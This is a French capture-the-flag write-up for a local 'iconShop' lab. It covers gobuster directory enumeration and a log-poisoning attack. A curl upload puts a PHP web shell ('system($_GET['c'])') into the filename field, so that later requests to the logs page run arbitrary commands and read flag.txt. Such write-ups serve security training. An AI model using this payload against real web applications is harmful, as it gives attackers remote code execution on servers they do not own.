﻿# iconShop

## Consignes :  


Votre ancien rival de l'école de WebDesign vient d'ouvrir sa galerie d'icônes.
Montrez-lui qu'un WebDesigner n'est pas un DevSecOps.

## Points attribués :  

```
25 Points
```

## Flag :  
```
FL@g{n0F1l3N4m354n171z4710n}
```


## Déroulé :  

Le site est une galerie d'icônes.
Sa mise en oeuvre est faite comme suit :
  docker-compose up


On s'y promène par l'intermédiaire du menu de catégorie à gauche, l'écran se rafraîchit par l'intermédiaire du paramètre $_GET['folder'].

Les différentes injections testées ne donnent rien :
  http://localhost/index.php?folder=foo
  http://localhost/index.php?folder=../
  http://localhost/index.php?folder=<script>alert(1)</script>
  ...

Le paramètre est contrôlé, aucune injection n'est possible.

Si l'on édite "index.php" :
```
Ligne 70:

            <!-- <li><a href="adm" class="text-white">Log in</a> -->

```

On accéde à la partie admin du site.
Une page de login s'affiche.
Cette page est un leurre, elle ne débouche sur aucune action.

On tente "gobuster"

```
	# gobuster dir  -u http://localhost -w /usr/share/wordlists/dirbuster/ directory-list-lowercase-2.3-small.txt
	===============================================================
	Gobuster v3.0.1
	by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
	===============================================================
	[+] Url:            http://localhost
	[+] Threads:        10
	[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt
	[+] Status codes:   200,204,301,302,307,401,403
	[+] User Agent:     gobuster/3.0.1
	[+] Timeout:        10s
	===============================================================
	2020/01/20 16:32:35 Starting gobuster
	===============================================================
	/img (Status: 301)
	/css (Status: 301)
	/js (Status: 301)
	/javascript (Status: 301)
	/logs (Status: 301)
	/adm (Status: 301)
	===============================================================
	2020/01/20 16:32:55 Finished
	===============================================================
```

Comme gobuster n'est pas récursif pour les fichiers, on relance gobuster sur le répertoire adm et les fichiers php :

```
  # gobuster dir  -u http://localhost/adm -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt  -x .php
  ===============================================================
  Gobuster v3.0.1
  by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
  ===============================================================
  [+] Url:            http://localhost/adm
  [+] Threads:        10
  [+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
  [+] Status codes:   200,204,301,302,307,401,403
  [+] User Agent:     gobuster/3.0.1
  [+] Extensions:     php
  [+] Timeout:        10s
  ===============================================================
  2020/01/20 16:34:08 Starting gobuster
  ===============================================================
  /index.php (Status: 200)
  /upload.php (Status: 200)
  ===============================================================
  2020/01/20 16:34:55 Finished
  ===============================================================
```

On a donc :
```
  /adm  
  /adm/index.php
  /adm/upload.php
  /css  
  /img  
  /index.php  
  /js  
  /logs
  /logs/index.php

/adm/index.php : Fenêtre de Login
/adm/upload.php : Fenetre d'upload dans laquelle il est annoncé qu'il faut être loggué.
```

Après édition du html, l'input type="file" à uploader s'appelle "myFile".

/logs/ affiche le log de l'utilisateur en cours basé sur son cookie de session qui se nomme "iconShop".
Les évènements loggués sont :
- Les changements de catégorie dans la navigation sur l'écran d'accueil
- Les tentatives de login sur la partie admin
- Les tentatives d'upload de fichier

```
  /var/www/html/logs/o98bimaidegg800jom4d3akum1.log

  [20-Jan-2020 16:41:28 Europe/Paris] Création de la session utilisateur
  [20-Jan-2020 16:41:39 Europe/Paris] Tentative de connexion au module admin
  [20-Jan-2020 16:41:44 Europe/Paris] Consultation de la catégorie  :
  [20-Jan-2020 16:41:46 Europe/Paris] Consultation de la catégorie  : action
  [20-Jan-2020 16:41:57 Europe/Paris] Tentative d'upload sans connexion
  [20-Jan-2020 16:42:11 Europe/Paris] Tentative d'upload
```

On tente d'uploader un fichier sans être loggué :

```
  curl 'http://127.0.0.1/adm/upload.php' -H 'Content-Type: multipart/form-data; boundary=---------------------------109244372717307918912107763368' -H 'Connection: keep-alive' -H 'Cookie: iconShop=o98bimaidegg800jom4d3akum1' --data-binary $'-----------------------------109244372717307918912107763368\r\nContent-Disposition: form-data; name="myFile"; filename="aa.jpg"\r\nContent-Type: image/jpeg\r\n\r\n-----------------------------109244372717307918912107763368--\r\n'

  /var/www/html/logs/o98bimaidegg800jom4d3akum1.log

  [20-Jan-2020 16:41:28 Europe/Paris] Création de la session utilisateur
  [20-Jan-2020 16:41:39 Europe/Paris] Tentative de connexion au module admin
  [20-Jan-2020 16:41:44 Europe/Paris] Consultation de la catégorie  :
  [20-Jan-2020 16:41:46 Europe/Paris] Consultation de la catégorie  : action
  [20-Jan-2020 16:41:57 Europe/Paris] Tentative d'upload sans connexion
  [20-Jan-2020 16:42:11 Europe/Paris] Tentative d'upload
  [20-Jan-2020 16:43:33 Europe/Paris] Tentative d'upload : aa.jpg
```

Le nom du fichier est loggué.

On tente un upload par curl avec un nom de fichier ""<?php echo system($_GET['c'])"

```
  curl 'http://127.0.0.1/adm/upload.php' -H 'Content-Type: multipart/form-data; boundary=---------------------------109244372717307918912107763368' -H 'Connection: keep-alive' -H 'Cookie: iconShop=o98bimaidegg800jom4d3akum1' --data-binary $'-----------------------------109244372717307918912107763368\r\nContent-Disposition: form-data; name="myFile"; filename="<?php echo system($_GET[\'c\']) ?>"\r\nContent-Type: image/jpeg\r\n\r\n-----------------------------109244372717307918912107763368--\r\n'
```

La consultation de la page "/logs/index.php?c=ls" donne :
  http://localhost/logs/index.php?c=ls

```
  /var/www/html/logs/o98bimaidegg800jom4d3akum1.log

  [20-Jan-2020 16:41:28 Europe/Paris] Création de la session utilisateur
  [20-Jan-2020 16:41:39 Europe/Paris] Tentative de connexion au module admin
  [20-Jan-2020 16:41:44 Europe/Paris] Consultation de la catégorie  :
  [20-Jan-2020 16:41:46 Europe/Paris] Consultation de la catégorie  : action
  [20-Jan-2020 16:41:57 Europe/Paris] Tentative d'upload sans connexion
  [20-Jan-2020 16:42:11 Europe/Paris] Tentative d'upload
  [20-Jan-2020 16:43:33 Europe/Paris] Tentative d'upload : aa.jpg
  [20-Jan-2020 16:45:32 Europe/Paris] Tentative d'upload : aa.jpg
  [20-Jan-2020 16:46:00 Europe/Paris] Tentative d'upload
  [20-Jan-2020 16:46:31 Europe/Paris] Tentative d'upload
  [20-Jan-2020 16:46:32 Europe/Paris] Tentative d'upload
  [20-Jan-2020 16:47:35 Europe/Paris] Tentative d'upload :
  [20-Jan-2020 16:48:58 Europe/Paris] Tentative d'upload : 233urv1vt42bgi1k84rppc6vm4.log
  index.php
  o98bimaidegg800jom4d3akum1.log

L'injection a fonctionnée.
Le root du site : "/logs/index.php?c=ls .."

  http://localhost/logs/index.php?c=ls ..

  /var/www/html/logs/o98bimaidegg800jom4d3akum1.log

  [20-Jan-2020 16:41:28 Europe/Paris] Création de la session utilisateur
  [20-Jan-2020 16:41:39 Europe/Paris] Tentative de connexion au module admin
  [20-Jan-2020 16:41:44 Europe/Paris] Consultation de la catégorie  :
  [20-Jan-2020 16:41:46 Europe/Paris] Consultation de la catégorie  : action
  [20-Jan-2020 16:41:57 Europe/Paris] Tentative d'upload sans connexion
  [20-Jan-2020 16:42:11 Europe/Paris] Tentative d'upload
  [20-Jan-2020 16:43:33 Europe/Paris] Tentative d'upload : aa.jpg
  [20-Jan-2020 16:45:32 Europe/Paris] Tentative d'upload : aa.jpg
  [20-Jan-2020 16:46:00 Europe/Paris] Tentative d'upload
  [20-Jan-2020 16:46:31 Europe/Paris] Tentative d'upload
  [20-Jan-2020 16:46:32 Europe/Paris] Tentative d'upload
  [20-Jan-2020 16:47:35 Europe/Paris] Tentative d'upload :
  [20-Jan-2020 16:48:58 Europe/Paris] Tentative d'upload : adm
  css
  flag.txt
  img
  index.php
  js
  logs
```

Il existe un fichier "flag.txt" (Forbidden en accès http).

```
  http://localhost/logs/index.php?c=cat ../flag.txt

  /var/www/html/logs/o98bimaidegg800jom4d3akum1.log

  [20-Jan-2020 16:41:28 Europe/Paris] Création de la session utilisateur
  [20-Jan-2020 16:41:39 Europe/Paris] Tentative de connexion au module admin
  [20-Jan-2020 16:41:44 Europe/Paris] Consultation de la catégorie  :
  [20-Jan-2020 16:41:46 Europe/Paris] Consultation de la catégorie  : action
  [20-Jan-2020 16:41:57 Europe/Paris] Tentative d'upload sans connexion
  [20-Jan-2020 16:42:11 Europe/Paris] Tentative d'upload
  [20-Jan-2020 16:43:33 Europe/Paris] Tentative d'upload : aa.jpg
  [20-Jan-2020 16:45:32 Europe/Paris] Tentative d'upload : aa.jpg
  [20-Jan-2020 16:46:00 Europe/Paris] Tentative d'upload
  [20-Jan-2020 16:46:31 Europe/Paris] Tentative d'upload
  [20-Jan-2020 16:46:32 Europe/Paris] Tentative d'upload
  [20-Jan-2020 16:47:35 Europe/Paris] Tentative d'upload :
  [20-Jan-2020 16:48:58 Europe/Paris] Tentative d'upload : FL@G{n0F1l3N4m354n171z4710n}
```

Le flag est trouvé.
